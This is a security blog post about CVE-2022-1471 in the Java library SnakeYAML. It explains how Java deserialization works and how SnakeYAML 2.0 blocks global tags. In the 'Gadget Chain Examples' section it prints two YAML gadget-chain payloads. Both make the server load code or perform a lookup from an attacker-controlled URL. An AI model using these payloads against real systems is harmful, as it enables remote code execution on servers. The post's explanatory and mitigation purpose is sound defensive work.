Resolving CVE-2022-1471 with the SnakeYAML 2.0 Release

In October 2022, a critical flaw was found in the SnakeYAML package that allows an attacker to achieve remote code execution by sending malicious YAML content, which is then deserialized by the `Constructor`. In February 2023, SnakeYAML 2.0 was released, resolving this flaw, which is tracked as CVE-2022-1471. Let’s break down how this version can help you resolve this critical flaw.

Exploring Deserialization

SnakeYAML is a popular Java library for parsing YAML (YAML Ain’t Markup Language). The library supports the full YAML 1.1 specification [1] and its native types [2], and it can serialize and deserialize Java objects. The remote code execution vulnerability exists because the library does not restrict which Java types can be instantiated when deserializing objects with `Constructor`.

Java serialization makes a great promise: take the state of an entire object graph, save it externally, and then magically restore that state when we deserialize. This was a big promise, because it replaced the very error-prone custom state-saving code that was common before Java. It may have been one of the most important reasons for Java’s success, and it is quite magical. We will now see how that magic becomes dangerous.

Mechanics

Java Serialization (How it Works)

Let’s first look at default Java serialization, using a simple POJO:

public static class Range implements Serializable {
    private final int low;
    private final int high;

    public Range(int low, int high) {
        if (low > high) {
            throw new IllegalArgumentException("Bad data");
        }
        this.low = low;
        this.high = high;
    }

    public int getLow() {
        return low;
    }

    public int getHigh() {
        return high;
    }
}

Serialization Mechanics

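final var range = new Range(3, 4);
// Declaring both streams in the try header closes (and therefore flushes) the
// ObjectOutputStream, so its buffered bytes actually reach output.ser.
try (final var fileOutputStream = new FileOutputStream("output.ser");
     final var objectOut = new ObjectOutputStream(fileOutputStream)) {
    objectOut.writeObject(range);
}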

When the object is passed to objectOut.writeObject, its values are not read by calling the POJO’s getter accessors.

Instead, serialization walks the object graph and reflectively scrapes the data directly from the fields.
This means that, by default, the object cannot control the serialized form of its internal state. This breaks encapsulation, because the code written inside the class is no longer used.
This is extralinguistic behavior: I cannot reason about how the code works just by reading it.
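A minimal sketch that makes this observable, assuming a copy of Range whose getters count their own calls (the `GetterDemo` class and its `getterCalls` counter are illustrative additions, not part of the original example). Serializing into an in-memory ByteArrayOutputStream writes both field values without ever invoking a getter:

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;

class GetterDemo {
    // Hypothetical instrumentation: incremented every time a getter runs.
    static int getterCalls = 0;

    static class Range implements Serializable {
        private final int low;
        private final int high;

        Range(int low, int high) {
            if (low > high) {
                throw new IllegalArgumentException("Bad data");
            }
            this.low = low;
            this.high = high;
        }

        int getLow() {
            getterCalls++;
            return low;
        }

        int getHigh() {
            getterCalls++;
            return high;
        }
    }

    // Serializes obj into memory and returns the number of bytes produced.
    static int serializedSize(Object obj) {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(obj);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return bytes.size();
    }

    public static void main(String[] args) {
        int size = serializedSize(new Range(3, 4));
        // The field values were written, yet neither getter was called.
        System.out.println(size + " bytes written, getter calls: " + getterCalls);
    }
}
```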

Deserialization Mechanics (How it Works)

When sending data out (serialization), we are at least responsible for how the object was constructed and whether its invariants were checked. Deserialization is even more of a nightmare, because we are consuming data from a world where attackers are waiting to take over the system.

try (final var fileInputStream = new FileInputStream("output.ser");
     final var objectIn = new ObjectInputStream(fileInputStream)) {
    final var range = (Range) objectIn.readObject();
    System.out.println(range.getLow());
}

When we read output.ser, we are not enforcing a checksum or any other integrity check. You can tamper with output.ser, send it to be deserialized, and it will be happily accepted as input.
When objectIn.readObject reconstructs the object, it does not fill in the values by calling the constructor:

public Range(int low, int high) {
    if (low > high) {
        throw new IllegalArgumentException("Bad data");
    }
    this.low = low;
    this.high = high;
}

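Instead, it creates the object through a phantom constructor: the no-argument constructor of the first non-serializable superclass (java.lang.Object here) runs, and the fields are then set reflectively.
The Range constructor and its invariant check are never executed.
This breaks encapsulation, because the code written inside the class is no longer used.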
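The bypass can be demonstrated end to end with a minimal in-memory sketch: serialize a valid Range(3, 4), overwrite the bytes that hold low, and deserialize the result. It rests on one stated assumption: for a class like this, with only primitive fields and no custom writeObject, the stream ends with the field values in sorted-by-name order (high, then low), so the last four bytes hold low. The `TamperDemo` class and its helper methods are illustrative names.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;
import java.nio.ByteBuffer;

class TamperDemo {
    static class Range implements Serializable {
        private final int low;
        private final int high;

        Range(int low, int high) {
            if (low > high) {
                throw new IllegalArgumentException("Bad data");
            }
            this.low = low;
            this.high = high;
        }

        int getLow() { return low; }
        int getHigh() { return high; }
    }

    static byte[] serialize(Object obj) {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(obj);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return bytes.toByteArray();
    }

    // Assumption: the stream ends with the int fields in name order (high, low),
    // so overwriting the last four bytes (big-endian) changes `low`.
    static byte[] tamperLow(byte[] stream, int newLow) {
        byte[] copy = stream.clone();
        ByteBuffer.wrap(copy).putInt(copy.length - Integer.BYTES, newLow);
        return copy;
    }

    static Object deserialize(byte[] stream) {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(stream))) {
            return in.readObject();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        } catch (ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        byte[] tampered = tamperLow(serialize(new Range(3, 4)), 10);
        Range range = (Range) deserialize(tampered);
        // The constructor never ran, so the low <= high invariant was never checked.
        System.out.println("low=" + range.getLow() + ", high=" + range.getHigh());
    }
}
```

No exception is thrown: the tampered stream yields a Range whose low is greater than its high, an object the constructor would never have allowed.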

Again, this is extralinguistic behavior, as I cannot reason about how the code works just by reading it.
We have to write more defensive code to make this class work correctly:

// Declared inside Range; ObjectInputStream finds and calls it reflectively.
private void readObject(ObjectInputStream objectInputStream) throws IOException, ClassNotFoundException {
    objectInputStream.defaultReadObject();
    if (low > high) {
        throw new InvalidObjectException("Bad data");
    }
}

Once again, this is a private method that is called reflectively during objectIn.readObject, where it checks the invariant once the fields have been restored. Without this defensive code, we cannot make the Range class work as expected.
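To see the check at work, the sketch below serializes a valid Range(3, 4) in memory, overwrites the last four bytes of the stream, and deserializes it. It assumes that for a class with only primitive fields and no custom writeObject, those last four bytes hold low, because field values are written in name order (high, then low). It throws InvalidObjectException, the conventional exception for a failed invariant during deserialization; the `DefensiveDemo` class and helper names are illustrative.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidObjectException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;
import java.nio.ByteBuffer;

class DefensiveDemo {
    static class Range implements Serializable {
        private final int low;
        private final int high;

        Range(int low, int high) {
            if (low > high) {
                throw new IllegalArgumentException("Bad data");
            }
            this.low = low;
            this.high = high;
        }

        int getLow() { return low; }
        int getHigh() { return high; }

        // Invoked reflectively by ObjectInputStream; re-checks the invariant.
        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            if (low > high) {
                throw new InvalidObjectException("Bad data");
            }
        }
    }

    static byte[] serialize(Object obj) {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(obj);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return bytes.toByteArray();
    }

    // Assumption: the last four bytes of the stream hold `low` (see lead-in).
    static byte[] tamperLow(byte[] stream, int newLow) {
        byte[] copy = stream.clone();
        ByteBuffer.wrap(copy).putInt(copy.length - Integer.BYTES, newLow);
        return copy;
    }

    // Returns the deserialized object, or null if readObject rejected the stream.
    static Object deserializeOrNull(byte[] stream) {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(stream))) {
            return in.readObject();
        } catch (InvalidObjectException e) {
            return null;
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        } catch (ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        byte[] valid = serialize(new Range(3, 4));
        System.out.println("valid stream accepted: " + (deserializeOrNull(valid) != null));
        System.out.println("tampered stream accepted: " + (deserializeOrNull(tamperLow(valid, 10)) != null));
    }
}
```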

Key Takeaways

Java serialization/deserialization makes heavy use of reflection to scrape data from object graphs.
The use of reflection breaks encapsulation and allows object constructors to be bypassed, which skips the checks that should run before an object is created.

Java serialization/deserialization is extralinguistic behavior, as one cannot reason about how the code works just by reading it.
And if one cannot reason about the correctness of the code, one cannot reason about its security either.
Java deserialization requires phantom methods like readObject to hold defensive code that validates the object before it is handed back to the caller.
Java deserialization supports polymorphic subtypes, which opens the door for malicious subtypes to attack.
Changing the encoding from native serialization to JSON or YAML doesn’t make it more secure, because the internal mechanics of reading and creating objects remain the same.
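For native Java serialization, the JDK (9 and later) offers an allow-list that addresses the polymorphic-subtype problem: a java.io.ObjectInputFilter that is consulted for each class in the stream before it is instantiated. This is a JDK mechanism swapped in for illustration, not part of SnakeYAML; the `FilterDemo` class, its `Range`, and the use of `java.util.Date` as the unexpected type are illustrative choices in this minimal sketch.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;
import java.util.Date;

class FilterDemo {
    static class Range implements Serializable {
        final int low;
        final int high;

        Range(int low, int high) {
            this.low = low;
            this.high = high;
        }
    }

    // Allow exactly one class by name and reject every other class ("!*").
    static final ObjectInputFilter ALLOW_RANGE_ONLY =
            ObjectInputFilter.Config.createFilter(Range.class.getName() + ";!*");

    static byte[] serialize(Object obj) {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(obj);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return bytes.toByteArray();
    }

    // Returns true if the stream deserialized, false if the filter rejected a class.
    static boolean accepted(byte[] stream) {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(stream))) {
            in.setObjectInputFilter(ALLOW_RANGE_ONLY); // must be set before the first read
            in.readObject();
            return true;
        } catch (InvalidClassException e) {
            return false; // thrown when the filter status is REJECTED
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        } catch (ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println("Range accepted: " + accepted(serialize(new Range(3, 4))));
        System.out.println("Date accepted: " + accepted(serialize(new Date(0))));
    }
}
```

The filter rejects the unexpected class as soon as its class descriptor is read, before any of its code can run, which is the same allow-list idea that SnakeYAML 2.0 applies to global tags.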

Exploiting the Vulnerability

Gadget Chain:

A gadget is a class or function that’s available within the execution scope of an application. A gadget chain is formed when multiple gadgets are chained together to achieve arbitrary code execution. [3]
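The core idea can be sketched with native Java serialization, without any real exploit. Below, `Gadget` is a hypothetical serializable class assumed to be on the classpath; its readObject hook stands in for the dangerous behavior of a real gadget and only sets a flag. Because the cast to Range is checked only after readObject returns, the gadget’s code has already run by the time the ClassCastException is thrown, just as it would with `(Range) objectIn.readObject()` from the deserialization example.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;

class GadgetDemo {
    // Records that the gadget's hook ran; a real gadget would do something harmful.
    static boolean sideEffectRan = false;

    // Hypothetical gadget: a serializable class whose deserialization hook runs code.
    static class Gadget implements Serializable {
        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            sideEffectRan = true; // stands in for, e.g., running an attacker-supplied command
        }
    }

    // The type the application actually expects.
    static class Range implements Serializable {
        final int low;
        final int high;

        Range(int low, int high) {
            this.low = low;
            this.high = high;
        }
    }

    static byte[] serialize(Object obj) {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(obj);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return bytes.toByteArray();
    }

    // The cast is checked only after readObject has fully built the object.
    static Range readRange(byte[] stream) {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(stream))) {
            return (Range) in.readObject();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        } catch (ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        try {
            readRange(serialize(new Gadget()));
        } catch (ClassCastException e) {
            System.out.println("cast failed, but sideEffectRan = " + sideEffectRan);
        }
    }
}
```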

SnakeYAML before 2.0 did not restrict which types could be instantiated during deserialization, which lets an attacker run arbitrary code if they control the YAML document. The `Constructor` class does not limit which classes can be instantiated during deserialization; in fact, any class on the Java classpath is available. Global tags were deliberately left unrestricted to fully support the YAML 1.1 specification, but as a result an attacker can specify arbitrary tags in the YAML document, which then get converted into Java “gadgets”.

Gadget Chain Examples:

The javax.script.ScriptEngineManager class is part of the standard Oracle/OpenJDK runtime. Consider the following gadget chain from Java Unmarshaller Security [4]:

!!javax.script.ScriptEngineManager [  
     !!java.net.URLClassLoader [[  
          !!java.net.URL ["http://attacker/"]  
     ]]  
]

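In this example, arbitrary code execution is possible once SnakeYAML deserializes the data above: the ScriptEngineManager constructor uses the supplied URLClassLoader to discover ScriptEngineFactory implementations through the service-provider mechanism, so it loads and instantiates a class served from the attacker’s URL. Specifically, SnakeYAML type checks the root element, but nested properties are not type checked, which can lead to disastrous consequences. An attacker can insert a reverse shell payload, resulting in shell access on the server running SnakeYAML. Here’s another example of a gadget chain in SnakeYAML using JdbcRowSetImpl, where setting autoCommit makes the object connect by performing a JNDI lookup of the attacker-controlled dataSourceName: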

!!com.sun.rowset.JdbcRowSetImpl
  dataSourceName: ldap://attacker/obj
  autoCommit: true

Mitigation:

Since 2.0, the SnakeYAML `Constructor` inherits from `SafeConstructor`, which prevents an attacker from accessing the classpath by default. When instantiating `Constructor` or `SafeConstructor`, you must pass a `LoaderOptions` object, on which you can set further parsing restrictions. By default, all global tags are now blocked.

Here's the exploit in action using the vulnerable SnakeYAML 1.33.

I start Python’s simple HTTP server to capture the outbound request. After running the code, a successful GET request from localhost appears in the server log. Success!

Securing the Vulnerability with SnakeYAML 2.0

Now, let’s jump into how SnakeYAML 2.0 prevents the attack.

To demonstrate how `TagInspector` prevents global tags, I instantiate a new `TagInspector` without overriding the default `isGlobalTagAllowed`, which prevents all global tags from being parsed as Java classes. If you want to allow-list some global tags, you can define your own `isGlobalTagAllowed` method. Note that it is not necessary to instantiate a `TagInspector` to block all global tags; I do so here only to show the default behavior.

I then run the code again, and this time it throws an exception!

The remote code execution is unsuccessful.

If you want to test out the code yourself, check out: https://github.com/1fabunicorn/SnakeYAML-CVE-2022-1471-POC

Keeping Your Applications Secure in the Future

How to Defend Against Java Deserialization Attacks:

Be extra careful with untrusted data from the internet.
Don’t put complex, loosely typed objects such as Maps in internet-facing DTOs; they can open the door to attacks.
Always review internet-facing DTOs to reason about their security.
Always use final classes for DTOs and for their field types, to disable polymorphic subtype parsing in the parsing library.
Try using Java Records as DTOs: they restrict what you can do with a class, and they force parsing libraries to call the constructor.
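A minimal sketch of why records help with native serialization, assuming Java 16 or later, where records are deserialized through their canonical constructor. It serializes a valid record, overwrites the last four bytes of the stream (assumed to hold low, since for a type with only int components and no custom serialization the values are written in name order: high, then low), and deserializes it. Because the compact constructor runs, the tampered stream is rejected instead of producing an invalid object. The `RecordDemo` names are illustrative.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidObjectException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;
import java.nio.ByteBuffer;

class RecordDemo {
    // A record DTO: its compact canonical constructor enforces the invariant.
    record Range(int low, int high) implements Serializable {
        Range {
            if (low > high) {
                throw new IllegalArgumentException("Bad data");
            }
        }
    }

    static byte[] serialize(Object obj) {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(obj);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return bytes.toByteArray();
    }

    // Assumption: the last four bytes of the stream hold `low` (see lead-in).
    static byte[] tamperLow(byte[] stream, int newLow) {
        byte[] copy = stream.clone();
        ByteBuffer.wrap(copy).putInt(copy.length - Integer.BYTES, newLow);
        return copy;
    }

    // Returns the deserialized object, or null if the canonical constructor rejected it.
    static Object deserializeOrNull(byte[] stream) {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(stream))) {
            return in.readObject();
        } catch (InvalidObjectException e) {
            return null; // the constructor's exception arrives wrapped in InvalidObjectException
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        } catch (ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        byte[] valid = serialize(new Range(3, 4));
        System.out.println("restored: " + deserializeOrNull(valid));
        System.out.println("tampered: " + deserializeOrNull(tamperLow(valid, 10)));
    }
}
```

Unlike the class-based Range, no readObject hook is needed here: the validation lives in one place, the constructor, and deserialization cannot skip it.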

Run an SCA scanner to find out whether you’re affected by a CVE, and update to the fixed versions.
Fixed versions of parsing libraries include defensive code and filters that protect against known attacks, so never skip version upgrades.

In conclusion, if you’re using SnakeYAML, ensure you have the correct `LoaderOptions` restrictions in place [5], or use SnakeYAML Engine [6], which is safe by default because it does not allow custom instances. Since SnakeYAML is a dependency of many projects, including Spring, a finding may not require action if you can confirm that the library depending on SnakeYAML does not use it in a vulnerable way. For example, Spring is unaffected because it parses only trusted YAML used for configuration [7] [8]. If you’re using SnakeYAML to parse untrusted YAML, upgrade to 2.0 so that global tags are blocked. If your scan includes SnakeYAML < 2.0, a high-severity vulnerability will appear, and if you use the `Constructor` class, a vulnerable method finding will also appear on your scan, highlighting the vulnerable usage.

To keep a pulse check on your software supply chain and its dependencies, make sure you’re integrating Software Composition Analysis (SCA) scans into your software development workflows.

A special thank you goes to Srinivasan Raghavan and Mateusz Krzeszowiec for their assistance in writing and reviewing this research.

[1] https://yaml.org/spec/1.1/current.html

[2] https://yaml.org/type/index.html

[3] https://brandur.org/fragments/gadgets-and-chains#gadgets-and-chains

[4] https://github.com/mbechler/marshalsec

[5] https://www.javadoc.io/doc/org.yaml/snakeyaml/latest/org/yaml/snakeyaml/LoaderOptions.html

[6] https://bitbucket.org/snakeyaml/snakeyaml-engine/src/master/

[7] https://github.com/spring-projects/spring-framework/pull/30048

[8] https://github.com/spring-projects/spring-boot/issues/33457